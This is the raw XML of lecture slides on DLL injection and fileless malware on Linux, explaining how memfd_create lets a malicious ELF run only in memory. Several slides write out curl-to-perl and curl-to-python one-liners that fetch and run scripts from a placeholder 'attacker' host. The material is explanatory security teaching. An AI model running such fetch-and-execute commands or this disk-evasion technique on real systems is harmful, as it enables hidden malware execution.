          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Differences of DLL injection between Windows and Linux  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Michael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Genkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3498426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r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>ELF in-memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Execution through Interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>FBK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a: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20</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35087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In most cases, Linux distributions installed on host devices have pre-installed software. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> interpreters and C compiler are, as a rule, available “out of the box”. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>addition, PHP is available on hosting platforms. So these languages can be used to execute code.</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21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Pre-installed Software That Can Be Used to Execute Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>FBK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89193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83568" y="2636912"/>
            <a:ext cx="7776864" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The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memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> system call is more noteworthy. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>system call is close to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3"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> but it does not return a pointer to the allocated memory but rather returns a file descriptor that refers to an anonymous file that is only visible in the filesystem as a link in </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proc/PID/</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fd</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which may be used to execute it using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4"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>(2).</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22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>FBK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1804091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To load our executable file on target quickly and easily we can, for example, pipe the script in which source we put the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Elf file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Perl interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1"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a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl http://attacker/evil_elf.pl |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perl</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="338328"/>
            <a:ext cx="8784976" cy="1252728"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Where the File Created by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600"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sz="3600" dirty="0" smtClean="0"/>
              <a:t> Are Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>FBK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="846457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520" y="3501008"/>
            <a:ext cx="8743411" cy="2088232"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="投影片編號版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A Scenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Malware Execution</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1293035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2675466"/>
            <a:ext cx="8435280" cy="3705861"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If the target host contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>interpreters, which are common pre-installed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>software in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>various distributions nowadays, an attacker can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>shell to execute the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://attacker/evil.pl | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1A7441"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>following commands </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker/evil.py | python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>command sets download a script to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>host from a remote host, and then invoke an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>interpreter to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>execute the script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>above operations do not create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>file in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a permanent storage of the target host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Execution through Interpreters</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1131778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2786616"/>
            <a:ext cx="8640959" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>In the Perl script case, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil_elf.pl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="759143" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>executes system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>configure an anonymous file in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>space of the process, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="759143" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>then writes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>malicious ELF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>binary into this anonymous file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="759143" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>finally </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>executes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>malicious binary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>malicious ELF still only resides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>in memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>of the process, not in a file at a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> permanent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>storage </a:t>
            </a:r>
            <a:r>
